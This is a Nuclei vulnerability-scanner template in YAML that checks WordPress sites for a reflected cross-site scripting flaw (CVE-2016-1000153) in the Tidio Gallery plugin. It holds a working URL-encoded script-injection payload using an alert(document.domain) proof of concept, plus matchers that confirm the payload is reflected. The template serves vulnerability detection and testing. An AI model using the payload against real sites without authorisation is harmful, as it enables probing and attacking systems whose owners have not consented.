my-nuclei-templates/CVE-2016-1000153.yaml

40 lines
1.1 KiB
YAML

id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin tidio-gallery v1.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
- http://www.vapidlabs.com/wp/wp_advisory.php?v=427
- https://wordpress.org/plugins/tidio-gallery
- http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000153
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200